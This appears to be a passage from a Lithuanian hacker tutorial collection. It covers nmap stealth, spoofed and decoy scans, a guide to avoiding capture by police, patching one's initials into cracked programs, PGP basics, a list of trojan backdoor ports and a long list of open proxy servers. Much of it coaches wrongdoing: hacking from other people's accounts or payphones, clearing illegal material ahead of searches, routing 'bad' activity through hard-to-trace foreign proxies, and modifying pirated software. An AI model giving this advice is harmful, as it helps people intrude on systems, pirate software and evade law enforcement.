Nurodo nmap’ui kokiu interfeisu siųsti paketus.

(lo, ppp0, eth0 ir etc.)

-g

Nurodo iš kokio porto skanuoti. Daugelis firewall’ų

bei filtrų padaro išimtis DNS (53) bei FTP-DATA

(20) paketams.

-r Nurodo nmap’ui portus skanuoti NE atsitiktine

tvarka.

-M

Nustato naksimalų susijungimu skaičių, kuris bus

naudojamas paralelėje su TCP(standartiškai) skanav­

imu.

LAIKO APRIBOJIMAI

-T

Paranoid – pats lėčiausias skanavimo būdas, Insane

– pats greičiausias, deja ne toks tikslus, ypač jei

tinklas lėtas. Vietoj žodžių galite naudoti ir -T

(0-5), kur 0 == Paranoid, 1 == Sneaky ir t.t.

–host_timeout

Nurodo kiek laiko nmap’as gali skanuoti duotąjį IP.

Laikas turi būti nemažiau nei 200 milisekundžių.

–max_rtt_timeout

Kiek daugiausia laiko nmap’as gali laukti atsakymo

iš skanuojamo IP.

–scan_delay

Nustato minimalų laiko tarpą, kuri nmap’as turi

laukti tarp bandymų. Tai naudingiausia siekiant

sumažinti tinklo apkrovimą.

TAIKINIO NURODYMO BŪDAI

Viskas, kas nėra opcijos, nmap’e suprantama kaip taikinys.

Paprasčiausias būdas yra nurodyti konkrečius IP arba hos­

tus. Jeigu norite nuskanuoti IP adresų subnet’ą, galite

pridėti /maskę hostname’ui ar IP adresui. Maskė turi būti

tarp 0 (norint nuskanuoti visą internetą) ir 32 (norint

nuskanuoti konkretų host’ą/IP. Naudok /24 ‘C’ klasės

adresų skanavimui bei /16 ‘B’ klasės adresų skanavimui.

nmap’as taip pat turi gan patogią galimybę nustatinėti IP

adresus sąrašais/atstumais. pvz. gali nuskanuoti ‘B’ klasę

užrašydamas 128.210.*.* arba 128.210.0-255.0-255 arba dar

128.210.0-50,51-255.1,2,3,4,5-255 . Manau kad tai pakanka­

mai patogu ir nesudėtinga.

KELETAS PAVYZDŽIŲ

nmap -sX -e lo -P0 -S 127.0.0.3 localhost

Pasinaudodamas Xmas Tree skanavimo metodu,

apsimetinėdamas, kad esu 127.0.0.3 Loopback protokolu

skanuoju savo localhost’ą Štai kaip atrodo ipchains’ų

log’as:

Packet log: input DENY lo PROTO=6 127.0.0.3:37009

127.0.0.1:139 L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)

kaip matote, kernelis yra įsitikinęs, kad jį skanuoja iš

127.0.0.3 o tai ir yra vienas svarbiausių uždavinių –

likti nematomiems 🙂

nmap -sS -O target.example.com/24

stealth SYN metodu nuskanuoja visas 255 mašinas, esančias

target.example.com ‘C’ klasėje. Taip pat bando nustatyti

kiekvieno iš jų operacinę sistemą.

host -l company.com | cut ‘-d ‘ -f 4 | ./nmap -v -iL –

suranda visus *.company.com hostus ir atiduoda juos

nmap’ui, kuris savo ruožtu įsijungęs verbose mode visus

juos nuskanuoja.

nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/crazy

-p 1-1024 -O crazy.com

skanauoja Null skanavimo režimu, panaudoja du decoy

adresus, viską logina į /tmp/crazy failą, skanuoja nuo 1

iki 1024 crazy.com portus bei stengiasi atspėti crazy.com

serverio operacinę sistemą

BUGAI

Vabalėliai? Kokie dar vabalėliai? Na.. jei rasit kokių,

būtinai siūskit autoriui: . Pachai

taip pat labai laukiami. Taip pat nepamirškite siūsti OS’ų

fingerprintus, kad nmap’o autoriai galėtų plėsti duom.

bazę. Apie tai smulkiau galite rasti docs/nmap-finger­

printing-article.txt dokumente arba nmap’o puslapyje:

http://www.insecure.org/nmap

AUTORIUS: Fyodor fyodor@insecure.org
IŠVERTĖ: Aurimas Mikalauskas inner@dammit.lt

PLATINIMAS

Naujausią nmap’o versiją visada galite rasti čia:

http://www.insecure.org/nmap/

nmap is (C) 1997,1998,1999,2000 by Fyodor fyodor@inse­cure.org

libpcap’as yra taip pat platinamas kartu su nmap’u.

Autorines teises į jį turi Van Jacobson, Craig Leres ir

Steven McCanne, visi iš Lawrence Berkeley nacionalinės

Laboratorijos Kalifornijos Universiteto, Berkeley, CA.

Versija platinama su nmap’u gali būti perrašinėjama. Sour­

cus galit parsisiūsti iš ftp://ftp.ee.lbl.gov/libp­cap.tar.Z

PABAIGAI

Džiaugiuosi, kad pagaliau pasiekėte galą. Dabar jau galite

skaityti save kvalifikuotu nmap’o guru.

beje, jei norite ką nors pridėti ar pakeisti šiame doku­

mente, arba (neduok Dieve) radot kokių tai bug’u, rašykit

man adresu, pateiktu sekcijoje išvertė. Šiaip šitas manu­

alas abejoju ar bus atnaujinamas, bet pačią naujausią

nmap-lt-HOWTO visada galite rasti mano puslapyje:

http://ice.dammit.lt/~inner/

37. Paranoja arba kaip neikliuti

Prie ko cia ta paranoja? As zinau kas yra exploitas etc ir as galiu hakinti viska kas hakinasi. Neaaaaaaa. Su tokiu poziuriu toli nenueisi. Matai, px tie exploitai etc jei tave seka (klausosi telefono pokalbiu, skaito email etc), jei tavo kompas konfiskuotas arba netgi pats suimtas.
Svarbiausia hakeriui ne zinoti daug exploitu etc, o buti nepagautam. Nes jei jau tave pagavo, tai tave gali ismesti is universiteto/darbo/mokyklos. Jei jau karta ikliuvai kaip hakeris, tai ir liksi su ta zyme likusi gyvenima. Ir kas svarbiausia: TU esi kaltas tol, kol kasnors neirodo priesingai. Adminui, kaip ir tau yra px istatymai (jis skiresi nuo taves tik tuo kad jo valdzioje yra servas), jei jis jau itare tave: skaitys tavo email, stebes tavo failus etc.

-=Taigi pateiksiu keleta metodu kaip neikliuti:=-

1. Visa mail`a sifruok PGP (jei nezinai kas tai tai suzinok).
2. Visus savo failus sifruok.
3. Laikyk visokius popierius (uzrasus etc) tol kol tikrai tau ju reikia. Visa kas nereikalinga sunaikink (sudegink etc, tik ne mesk i siuksline. Del ko? Skaityk apie trashinga).
4. Visus duomenis nusikopijuok (ir uzsifruok) i kita laikmena (CD, ZIP, Hard`a etc). Laikyk juos kurnors kas nesusije su tavimi, hackingu. Taip neprarasi kratos metu savo duomenu ir siaip bus geras BackUP`as.
5. Narsydamas www islik anoniminis. Kaip tai padaryti? Skaityk straipsni Proxy serveriai.
6. Nehakink is savo linijos, savo acounto. Naudok svetimus acountus, eik i interneto svetaines (bus sunku arba net neimanoma atsekti), skambink is taksafono.
7. Atskiriems acountams, duomenims naudok vis kitus slaptazodzius. Taip suzinojus viena is ju maziau nukentesi.

Sis sarasas gali vis tesis ir testis. Atmink kad spionazui (taves sekimui) gali buti panaudota, tokia technika, kad net neitari ja esant. Pvz. pagal moniko skeidziamus spindulius galima sekti tavo moniko vaizda daugiau negu 100 m. atstumu, galima lazeriu pagalba sekti stiklo virpejima ir klausytis tavo pokalbiu, paspaudus klavisa isksiriamas tam tikras auksto daznio signalas pagal kuri galima sekti tavo klavisu paspaudimus ir daug daug kitu metodu.

Ka daryti jei jau esi itariamas? Net ir durniui aisku kad daba tave seks. Tad protingiausiai nusiraminti kol viskas praeis. Nesidometi hakingu, ispeti draugus kad nerasytu jokiu itartinu mail`u (PGP sifruota zinute taip pat kelia itarima), nesneketu apie nelegalia veikla telefonu. Taip pat reikia tiketis kratos, tad visa nelegale info, softa pasalink is savo buto/kompo. Ka veik si laika? Zaisk zaidimus, skaityk, tobulink savo programavimo igudzius etc.

-=Na o ka daryt ikliuvus?=-

1. Tuoj pat kreipkis i advokata. Jis turi pasistengti kad nebutu atliekama krata. Tai nedaug ka pades, bet sumazins ikalciu skaiciu, pasunkins teisesaugai tyrima etc. Parodyk, kad lengvai nepasiduosi.
2. Nekalbek su mentais. Jei gali pasakyti bet ka, kad tu viska ispasakotum. Pvz.: kad paleis jei viska papasakosi. Taip nebuna, jei negali to padaryti. Tai gali tik prokuroras. Nieko mentams nepasakok, sakyk kad kalbi tik per advokata etc. Pats be kalbedamas gali netycia “susivartyti”, prasitarti etc.
3. Tarkis su advokatu, kaip islipti is sito meslo.

Beto: neisduok savo darugu, kitu hakeriu etc. Visu pirma tu busi ozys, antra- gali prisidirbti dar daugiau (tu mani jei potos isdavystes apie tave nieko pasakyt nenores/negales).

Isvada:

-=NEIKLIUK, NEIKLIUK, NELEISK NET KAD TAVE ITARTU!!! TAPK PARANOJIKU!!! NEUZMIRS NIEKO KA CIA PERSKAITEI!!=-

38. Kaip Palikti Inicialus Nulauzhtoje Programoje

Jeigu jums sunku skaityti, tai yra reikia smaukty scrol bara apachioje(atiprashau uzh ishsireishkima:)) bet tinkamesnio zhodzhio nerada:) tada paspauskite EDIT ir isijunkite WORD WRAP
aha na ir ka chia dabar jums pasakius, o gi tai kad manau kas bent kiek yra crackines (tikiuosi sekmingai:))) ir jei jam tai pavykdavo o jei dar ne, tai tikrai pavyks:) , tai vat vienu zhodzhiu kai nukrakini progse tai apima tarsi palaimos jausmas, tarsi pasidydzhiavimas, kad vat ash ja iveikiau, ash apejau ta prakeikta apsaugos sistema:) kuri ribojo mano veiksmus, taigi kaip parodyti kad butent tu nukrakinai ta ar kita progse, kitaip sakant kaip joje palikti inicialus, juk ir mes jau prie jos truputi prisidejome:)) argi ne?? o butu ish viso puiku jei tavo darba kazhkas prisiimtu sau. taigi viskas ko jums reikes tai papraschiausio hex editoriaus, na ash naudoju HIEW (visu papraschiausias naudojimui ish tu kuriuos ishbandzhiau ir manau geriausias:)) bet tai mano smeninis pozhiuris) taigi o kitas dalykas ko mums reikes tai papraschiausios hexines abeceles, na ash ja taip vadinu:

a-61 A-41 / – 2F Space – 00 or 20
b-62 B-42 – 5C
c-63 C-43 . – 2E
d-64 D-44 – – 2D
e-65 E-45 : – 3A
f-66 F-46 = – 3D
g-67 G-47 ? – 3F
h-68 H-48 ! – 21
i-69 I-49 ” – 22
j-6A J-4A $ – 24
k-6B K-4B % – 25
l-6C L-4C & – 26
m-6D M-4D ( – 28
n-6E N-4E ) – 29
o-6F O-4F 1 – 31
p-70 P-50 2 – 32
q-71 Q-51 3 – 33
r-72 R-52 4 – 34
s-73 S-53 5 – 35
t-74 T-54 6 – 36
u-75 U-55 7 – 37
v-76 V-56 8 – 38
w-77 W-57 9 – 39
x-78 X-58 0 – 30
y-79 Y-59 + – 2B
z-7A Z-5A * – 2A

taigi juk kiekvienoje programoje yra kokie nors zhodzhiai pavyzdzhiu visit our site ar kokiam ABOUT skirsnyje parashyta programos versija ir panashiai taigi atsidarome jau nukrakinta(nebutinai) programa hex editoriumi ir susirandame koki nors zhodi jei naudosite HIEW tai ishpardzhiu paspauskite F7 ir kur parashyta ASCII irashykite ieshkoma fraze , kuria jus noresite pakeisti. ir paspauskite ENTER. na ka kai rasite butent ta vieta kuria jus norite pakeisti neskubekite jos keisti textiniam rezhime, nes nieko jums nepavyks ir programa bus visishkai sugadinta, o juk mes nenorime kad taip atsitiktu:)(ypach jei i ja idejome tiek sunkaus darbo:)) taigi susiradome ta fraze kuria keisime ir tada spaudzhiame F4 ir pasirenkame HEX na jei naudojate kita hex editoriu tai nezhinau kur tai pasirinkti, bet viskas ko jums reikia tai susirasti ta fraze textiniame rezhime ir paskui viska pakeisti i HEXini rezhima. taigi matote kad viena raide tai du skaichiai taigi ir pazhvelkite i ta abcele kuria ash jums daviau kad kiekviena raide sudaryta is dvieju simboliu PVZ:
zona zhodis bus:
7A 6F 6E 61
kur z=7A o=6F n=6E a=61

taigi jusu rasta fraze pakeite i hex rezhima ir keichiame tokiu budu bet nepersistenkite bekeisdami, kadangi jei virshisyte rastos frazes zhodzhiu simbolius bent vienu simboliu PVZ:
jei ash norejau pakeisti LABAS i NELABAS tada programa nebeveiks, na vienu zhodzhiu reikia keisti i tiek pat simboliu PVZ:

jeigu noriu pakeisti fraze :
MAIL to: zona@xxx.lt

taigi gali irashyti savo 19 simboliu, nes tarpas taip pat simbolis, taipogi galiu irashyti ir mazhiau MATOMU simboliu bet likusius turesiu tada uzhrashyti tarpais tai yra 00 arba 20 nes kaip sakau negalima keisti baitu skaichiaus.

PS:nepalikite originalaus kurejo ant ledo:))
nes tai Lamerishka visa garbe prisiimti sau tai ka shiam kartui tiek zhiniu:)

39. Trumpai apie PGP

Kas yra PGP?

PGP (Pretty Good Privacy ) yra vienas geriausiu sifravimo algoritmu,
placiai naudojamas sifruojant email`a ir duomenis.
PGP pagristas dvieju raktu- private ir public, autorizacija.
t.y. duomenys sifruojami ir issifruojami dviem raktais,
kuriu vienas yra viesas, o kitas privatus. Privatu rakta turi
tik informacijos koduotojas ir tas kas ta informacija iskoduos.

Kokioms platformoms skirta PGP?

PGP sifratoriu/desifratoriu yra beveik visoms operacinems
sistemoms:
MS-DOS
WINDOWS
UNIX/LINUX
VAX/VMS
BeOS
Windows sistemai populeriausia PGP programa yra WinPGP,
bei pasto programa The Bat.
Linux sistemoje naudojama gpg. Email programa palaikanti PGP- mutt

Kur dar pritaikoma PGP?

PGP pritaikoma tikrinti distribuciju legaluma/tikruma.
PVZ. Red Hat rpm paketu originalumas patikrinamas PGP metodu
(check PGP signature).

Populiariausiu trojanu portai

Trojano vardas : – Portas –
The tHing 6400
NetBus 1.x 12345
12346
NetBus Pro 20034
BackOriffice 31337
SubSeven 1243
NetSphere 30100
Deep Throat 1,2,3.x 6670
Master Paradise 31
Silencer 1001
Millenium 20000
Devil 1.03 65000
NetMonitor 7306
Streaming Audio Trojan 1170
Socket23 30303
Gatecrasher
Net Control (added 10/05/00)

6969
Telecommando 61466
Gjamer 12076
IcqTrojen 4950
Priotrity 16969
Vodoo 1245
Wincrash 5742
Wincrash2 2583
Netspy 1033
ShockRave 1981
Stealth Spy 555
Pass Ripper 2023
Attack FTP 666
GirlFriend 21554
Fore, Schwindler 50766
Tiny Telnet Server 34324
Kuang 30999
Senna Spy Trojans 11000
WhackJob 23456
Phase0 555
BladeRunner 5400
IcqTrojan 4950
InIkiller 9989
PortalOfDoom 9872
ProgenicTrojan 11223
Prosiak 0.47 22222
RemoteWindowsShutdown 53001
RoboHack 5569
Silencer 1001
Striker 2565
TheSpy 40412
TrojanCow 2001
UglyFtp 23456
WebEx 1001
Backdoor 1999
Phineas 2801
Psyber Streaming Server 1509
Indoctrination 6939
Hackers Paradise 456
Doly Trojan 1011
FTP99CMP 1492
Shiva Burka 1600
Remote Windows Shutdown 53001
BigGluck, aka TN in our archive 34324
NetSpy DK 31339
Hack´99 KeyLogger 12223
iNi-Killer 9989
ICQKiller 7789
Portal of Doom 9875
Firehotcker 5321
Master Paradise 40423
BO jammerkillahV 121
AOLTrojan1.1 30029
Hack’a’tack 31787
The Invasor 2140
SpySender 1807
The Unexplained 29891
Bla 20331
FileNail 4567
ShitHeep 69123
Coma 10607
Bla1.1 1042
HVL Rat5 2283
BackConstruction1.2 5400
Kuang2 theVirus 17300
Xtcp 2.00 + 2.01 5550
Schwindler 1.82 21554
Doly trojan v1.35 1010
Doly trojan v1.5 1015
Wingate (Socks-Proxy) 1080
Vampire 6669
DeltaSource 6883
Trojan Spirit 2001 33911
Maverick’s Matrix 1.2 – 2.0 1269
2025

Total Eclypse 1.0 3791
OOTLT + OOTLT Cart 5011
Eclipse 2000 12701
NetMetro 1.0 5031
Illusion Mailer 5521
InCommand 1.0 + 1.3 + 1.4 07/01/00) 9400
1029
1029
NeTadmin 555
Logged! 20203
Shitheep 6912
Schoolbus 1.6 54321
Schoolbus 2.0
Chupacabra 20203
TheThing 1.6 6000
AimSpy 777
NetMetropolitan 1.04 5032
5031
Transcout 1.1 + 1.2 1999
SoftWar 1207
Ambush 10666
Der Spaeher 3 Insane Network 2000
2001
1000
1001
The Prayer 1.2 + 1.3 9999
2716
Host Control 1.0 6669
11050
Yet Another Trojan 37651
NetRaider 57341
TCPShell.c 6666
PC Crasher 5637
5638
Mini Command 1.2 1050
Mosucker 16484
Rat 1.2 2989
2989
FakeFTP 1966
Intruse Pack 1.27b 30947
Snid X2 3586
7609
1784
Freak 88 7001
Asylium 0.1&0.11&0.12&0.13 23432
Prosiak 44444
23 (telnet option)
Traitor 2.1 SSFS 1.0 21
Connection 60411
Host Control 2.6 10528
11051
15092
7424
7424
BIONET 12349
Rux.PSW 2208
CrazyNet 17490
17500

40. Proxy

Proxy serveriu naudojimas arba anonimiskumas narsant
Kiekviena syki kai jus narsote www, jusu vizitas gali buti loginamas. Viskas: jusu IP, jusu narsykle, OS, ekrano rezoliucija, netgi tai is kur atejote.
Aisku yra grupes zmoniu kuriems tai nepatinka. Taip aisku dazniausiai ir ikliuna ar kitaip prisidirba zmones. Pvz.: kai BTV zurnalistas atskleide zmogzudyste ir apie ja imete i www.btv.lt, VSD (valstybes saugumo departamentas) susirupino, mat ta zmogzudyste buvo valstybine paslaptis ir konfiskavo serva su visais logais, tai yra su visa info kas mate si puslapi. Tai va ar jums patiktu jei viena diena ateitu pas jus kazkas (kad ir VSD) ir vien del to, kad jus apsilankete vienam ar kitam www puslapyje.

Yra keletas budu, kaip nuo to apsisaugoti, kaip likti anonimiskam. Vienas is ju yra moketi bapkes kazkokiom firmom kurios tuo rupinasi (tave anonimizuoja), arba kita- naudoti (kaip jus ir spejate) proxy serverius.

Kaip tai padaryti? O gi sukonfiguruoji savo narsykle ir viskas: Ant Netscape – edit->preferences->advanced->proxy->manual proxy configuration ir spausti View. Atsiradus dialogo lentelei uzrasyti proxy serveri ir porta. Ant Internet Explorer- tools->internet option->conection-> lan setings. Nurodant proxy serveri reike nurodyti ir porta. Dazniausiai naudojami 80 ir 8080 portai.

Taip pat kai kurie download saitai leidzia parsisiusti progses tik, tarkim, USA gyventojams, o jus norite butent parsisiusti progse is to saito. Iseitis: susirandi USA proxy ir ji naudoji.

Kaip rasti proxy serveriu adresus? Galima ieskoti kokiu ju listu arba bandyti paciam speti. Patikrinti ar toks proxy egzistuoja galime taip:
ping proxy.koks-nors-provaideris.net
Jeigu jus gausite atsakyma kaip pvz. “Bad IP”, vadinasi shiame serve proxy nera, bet jeigu pasirodys ICMP echo, ko gero, jus radote tai, ko ieshkojote. Provaideriu sarashus galite gauti darant paieshka ivairiose paieshkos stotyse (yahoo.com, altavista.digital.com, etc.) “ISP list” tema.

Bet is tikro proxy servai anonimiskumo negarantuoja. Jai jus padarysite ka nors blogo, tai auka (arba istatymo sergetojai) gali paprasyti proxy serverio admino, kad duotu jusu ip. Patarimas: jei ka bloga darysit, naudokit kokius kinietiskus ar pan. proxy servus, nes is ju bus sunkiau isgauti info. Beje galima proxy jungti i grandines. Kaip tai padaryt naudojant Netscape? Reikia nueiti edit->preferences->advanced->proxy->manual proxy configuration ir rasyti proxy serverius taip: proxy1.dom:port//proxy2.dom:port//proxy3.dom:port ir pan. Primenu kad kuo daugiau proxy servu naudosit tuo daugiau kris jusu ineto rysys.

Kaip veikia proxy servai?

Tau uzrasius url, adresas perduodamas proxy servui. Jis savo ruoztu nueina ten ir parsiuncia visa puslapi (arba jama is vietinio cashe katalogo), kuri meta tau. Tad is tikro ne tu ateini i norima url, o proxy serveris. Tad loginama proxy servo IP, o ne tavo.

41. Proxy Adresai

Proxy serveriu adresai
Cia pateikiu proxy serveriu adresu (jie, kaip matote, pateikti abeceles tvarka). Pastaba: gali atsitikti taip, kad nurodytas netinkamas proxy serverio portas. Tuomet bandykite visus standartinius proxy portus: 80, 3128, 8080.

-=ARPA – ARPANET=-
227.11.58.209.in-addr.arpa 80
66.216.50.207.in-addr.arpa 80
81.98.178.204.in-addr.arpa 80
82.192.16.12.in-addr.arpa 80

-=AR – ARGENTINA=-
noc.uncu.edu.ar 8080

-=AT – AUSTRIA=-
aphrodite.iaccess.com.au 80
aplan.dnb.com.au 80
core1-s242-2.centris.net.au 80
fewalker.ozemail.com.au 80
firewall.brim.vic.gov.au 80
hutsg7p49.hutch.com.au 80
hutsg9p2.hutch.com.au 8080
jethro.meriden.pas.com.au 80
kalima.ozemail.com.au 80
mail.coolmore.com.au 80
mel.proxy.ozemail.com.au 80
nordex.ozemail.com.au 80
phoenix.bushnet.qld.edu.au 80
203.28.209.34 80
pluto.netlinkwa.com.au 80
202.61.216.2 80
staff.netlinkwa.com.au 80
proxy.hutch.com.au 80
proxy.library.uq.edu.au 80
proxy.primus.com.au 80
sas.netcam.com.au 80
server1.cgs.com.au 80
sydexc2.tmpw.com.au 80
tdone.tudogs.net.au 80
wacka11.wackado.com.au 80
www2.transport.tas.gov.au 80

-=CA – CANADA=-
httpproxy.math.uwaterloo.ca 80
nd253.notredame.sk.ca 80
pc252.ldss.avonmaitland.on.ca 80
pr1.nbed.nb.ca 80
pr2.nbed.nb.ca 80
pr3.nbed.nb.ca 80
pr4.nbed.nb.ca 80
wsd.inet.quill-lake.sk.ca 80

-=CZ – CZECH REPUBLIC=-
bg.pcdir.cz 80
inet01.cabletel.cz 80

-=COM – COMMERCIAL=-
194.72.124.13 80
202.96.134.165 8080
agatlmis01.atl.agcocorp.com 80
anon-sol.free.anonymizer.com 80
asb-hou02.axsia.com 80
bbs.packardbell.com 80
beachboy.kajen.com 8080
berk.com 8080
blaze.syncsort.com 80
cacheflow-1.fwi.com 80
cacheflow-1.fwi.com 8080
cacheflow01.ripnet.com 80
cadworld.com 80
chacal.msage.com 80
d058656.sce.com 80
dym.com 80
eaglent.cemexusa.com 80
eilat.gambit.com 80
filter.burgoyne.com 3128
ftp.sylvania.com 80
gatekeeper.imall.com 80
gateway.hro.com 8080
imsp085.netvigator.com 80
imsp087.netvigator.com 80
inktomi.efortress.com 80
internet-gw1.hea.com 80
invis-ascella.free.anonymizer.com 80
invis-sirrah.free.anonymizer.com 80
ipfilter.hknet.com 80
mail.eg.blommer.com 80
mail.immgmt.com 80
mail.itdynamics.com 80
melnc01.bigpond.com 80
prefetch-atm.nycap.rr.com 8080
proxy-east1.get2net.com 80
proxy01.dbn.iafrica.com 80
proxye3-atm.maine.rr.com 8080
proxye4-atm.maine.rr.com 8080
raistlin.carinthia.co.at 80
sabatini.bestnet.com 80
sgsst.com 80
smtpgw.national-city.com 80
sydnc01.bigpond.com 80
tibinc.com 80
titan.datainternet.com 8080
virtual-domains.flash.net 8080
webcache.us.newbridge.com 80
worf-gw.calspan.com 80
www.intwebservice.com 80

-=DE – GERMANY=-
etecs5.uni-duisburg.de 80
fhdo2.dvz.fh-dortmund.de 80
hdihp2-f.fzk.de 80
nor1s005.jungheinrich.de 80
p3.uhlencom.de 80
3.97.243.195.in-addr.arpa 80
rena.zfn.uni-bremen.de 3128
ultra1b.noc.fh-aachen.de 3128

-=DK – DENMARK=-
linsrv0.staff.kvl.dk 80

-=EDU – EDUCATIONAL=-
bogachiel.evergreen.edu 8080
hawkmoon.northwood.edu 8080
liberty.uc.wlu.edu 80
rhino.evansville.edu 80
vanguard.vg.pdx.edu 80
www.samford.edu 8080
zeus.fiu.edu 8080

-=ES – SPAIN=-
atenea.uax.es 80

-=FI – FINLAND=-
dlc.fi 80

-=FR – FRANCE=-
cache-web.grenet.fr 80
proxycf1.grolier.fr 80
proxycf1.grolier.fr 8080

-=HR – CROATIA=-
gita.srce.hr 80

-=IS – ICELAND=-
nafni.skyggnir.is 80
ns0.ok.is 80
helios.vortex.is 80

-=IT – ITALY=-
dns.lcnet.it 8080
proxy.micanet.it 80

-=JP – JAPAN=-

cairo.osu.ac.jp 8080
cs.oita-med.ac.jp 80
hanshin.koshien-c.ac.jp 80
kpcu.kumamoto-pct.ac.jp 8080
ns.nagano-kentan.ac.jp 8080
ns40c.mis.ous.ac.jp 8080
proxy.baiko.ac.jp 80
sakpro.eiyo.ac.jp 80
sugagw.ci.noda.sut.ac.jp 80
ebisu04.ebisu.ad.jp 8080
denntr01.sunwa.co.jp 8080
dns1.infocom.co.jp 80
dns1.k-sn.co.jp 80
dtsgate.dotshell.co.jp 80
halgw.hallab.co.jp 80
inet-sv.zenon.co.jp 8080
ips-gw.ymdchem.co.jp 8080
nis-in.nara-js.co.jp 80
ns.hayashikk.co.jp 80
ns.matsugc.co.jp 8080
ns.sanshusha.co.jp 80
ns0.apecs.co.jp 8080
www.nidec.co.jp 8080
segw.seng.co.jp 80
sekigate_e.sekitech.co.jp 8080
svtyo04f.nrsgroup.co.jp 80
topgun.polymatech.co.jp 8080
www.housefoods.co.jp 80
www.apel.ne.jp 8080
dns.jicnet.or.jp 8080
kuramoto.miyamizu.or.jp 8080
ns1.shokokai-nagasaki.or.jp 8080
www.health-net.or.jp 8080
www.ink.or.jp 8080
kusu.city.kurume.fukuoka.jp 8080
ns.nousi.pref.okinawa.jp 80
ns.ntts.mihama.chiba.jp 8080
watson.ysp.pref.yamaguchi.jp 8080
apty.rcb.gr.jp 8080

-=KR – KOREA=-
biho.taegu.ac.kr 8080
cache2.kornet.nm.kr 80
cvs2.kyunghee.ac.kr 8080
www.hanilgroup.co.kr 8080
proxy.chungnam.ac.kr 8080

-=LT- LITHUANIJA=-
proxy.5ci.lt 80
proxy.is.lt 80

-=MIL – US Military=-
onion-router.nrl.navy.mil 9200
onion-router.nrl.navy.mil 9200

-=NET – NETWORK=-
205-219-79-148.bayarea.net 8080
alpha1.excell.net 8080
tomato.ulcc.wwwcache.ja.net 8080
beginners.net 80
bos2-wc1.atlas.digex.net 80
bos2-wc2.atlas.digex.net 80
bradpst.bayarea.net 80
bread.mcc.wwwcache.ja.net 8080
cache-1.ftsm.ipa.net 80
cache-1.jopl.ipa.net 80
cache-e0.hom.net 80
cache1.sntc01.pacbell.net 80
cachef.citytel.net 80
cacheflow.bright.net 80
cacheflow.insync.net 80
cacheflow2.mpinet.net 80
cachesrv.1st.net 80
garlic.mcc.wwwcache.ja.net 8080
concord01.pop.internex.net 8080
dca1-wc1.atlas.digex.net 80
dca1-wc1.atlas.digex.net 8080
dca1-wc2.atlas.digex.net 80
dca1-wc2.atlas.digex.net 8080
dead.mcc.wwwcache.ja.net 8080
dynacache.ultra.net 80
elpxy01.ce.mediaone.net 8080
ginger.mcc.wwwcache.ja.ne 8080
hamster.slip.net 8080
holtcompanies.com 80
korma.connect-2.net 80
kraken.telstra.net 3128
lhsa-proxy.shutter.net 80
loxppp6-sp5.suapha.loxinfo.net 80
loxppp67-usr.suapha.loxinfo.net 80
loxppp8-sp10.suapha.loxinfo.net 80
loxusr1.suapha.loxinfo.net 80
magic.brasilnet.net 80
mail.startec.net 80
markpt.hom.net 80
oregano.ulcc.wwwcache.ja.net 8080
munti.i-next.net 80
netcache.apk.net 80
nexus-1.flash.net 8080
nexus-2.flash.net 8080
ns.egyptian.net 8080
ns.htc.net 8080
ns1.isol.net 80
oproxy.cvzoom.net 80
pasco.se.mediaone.net 8080
pepper.mcc.wwwcache.ja.net 8080
pm3-1-user-39.mgv.hom.net 80
polk.se.mediaone.net 8080
proxy.elkgrove.net 80
119.63.170.206.in-addr.arpa 80
cacheflow.golden.net 3000
cacheflow.golden.net 80
proxy.touch.net 80
q.netunlimited.net 80
salt.mcc.wwwcache.ja.net 8080
server1.bisnet.net 80
sjc4-wc1.atlas.digex.net 80
sjc4-wc1.atlas.digex.net 8080
smfcache-1.jps.net 80
sun.hallertau-online.net 80
theseus.mcc.wwwcache.ja.net 8080
virtual-domains.flash.net 8080
waltz.rahul.net 80

-=NL – NETHERLANDS=-
hades.hro.nl 8080
webproxy.gelrevision.nl 80

-=NO – NORWAY=-
alpha1.hnett.no 8080

-=NZ – NEWZEALAND=-
graeme1.iprolink.co.nz 80
www.progress.co.nz 80

-=ORG – ORGANIZATION=-
gw.waaa.org 80
mail.archdiocese-no.org 80

-=PH – PHILIPPINES=-
electron2.msc.net.ph 3128

-=PL – POLAND=-
sunsite.icm.edu.pl 8080

-=PT – PORTUGAL=-
beta.di.uminho.pt 80
leonardo.isec.pt 8080
socks.isec.pt 8080
194.65.52.252 8080

-=QT – QUATAR=-
proxy1.qatar.net.qa 8080

-=RU – RUSSIA=-
adam.rosinkas.ru 80

-=SE – SWEDEN=-
www.sls.se 8080

-=SG – SINGAPORE=-
proxy1.tp.ac.sg 80
inet.gatxterminals.com.sg 8080

-=TH – THAILAND=-
netcache.loxinfo.co.th 80
proxy.rsu.ac.th 8080
swallow.cat.net.th 8080
proxy2.rsu.ac.th 8080

-=TW – TAIWAN=-
c1.h202052106.is.net.tw 80
club.golden.com.tw 8080
server.928.com.tw 3128
www.cisc.iii.org.tw 8080
www.ecs.com.tw 80

-=UK – UNITED KINGDOM=-
horatio.cre.canon.co.uk 8080
softy.poptel.org.uk 8080
ns0.mistral.co.uk 3128
thingy.eng.abdn.ac.uk 80
webcache18a.cache.pol.co.uk 80
webcache18b.cache.pol.co.uk 80
webcache21a.cache.pol.co.uk 80
webcache21b.cache.pol.co.uk 80
webcache22a.cache.pol.co.uk 80
webcache22b.cache.pol.co.uk 80
webcache23a.cache.pol.co.uk 80
webcache23b.cache.pol.co.uk 80
webcache24a.cache.pol.co.uk 80
webcache24b.cache.pol.co.uk 80
webcache25a.cache.pol.co.uk 80
webcache25b.cache.pol.co.uk 80
webcache26a.cache.pol.co.uk 80
webcache26b.cache.pol.co.uk 80
webcachew01a.cache.pol.co.uk 80
webcachew01b.cache.pol.co.uk 80
webcachew02a.cache.pol.co.uk 80
webcachew02b.cache.pol.co.uk 80
webcachew03a.cache.pol.co.uk 80
webcachew03b.cache.pol.co.uk 80
webcachew04a.cache.pol.co.uk 80
webcachew04b.cache.pol.co.uk 80
webcachew05a.cache.pol.co.uk 80
webcachew05b.cache.pol.co.uk 80
webcachew06a.cache.pol.co.uk 80
webcachew06b.cache.pol.co.uk 80
webcachew07a.cache.pol.co.uk 80
webcachew07b.cache.pol.co.uk 80
webcache05b.cache.pol.co.uk 80
webcache06b.cache.pol.co.uk 80
webcache01b.cache.pol.co.uk 80
webcache02b.cache.pol.co.uk 80
webcache04b.cache.pol.co.uk 80

-=US – UNITED STATES=-
cache.manistee-isd.k12.mi.us 81
ci.blue-springs.mo.us 80
dcs.dexter.k12.mi.us 80
hal.calc.k12.la.us 8080
koa.iolani.honolulu.hi.us 80
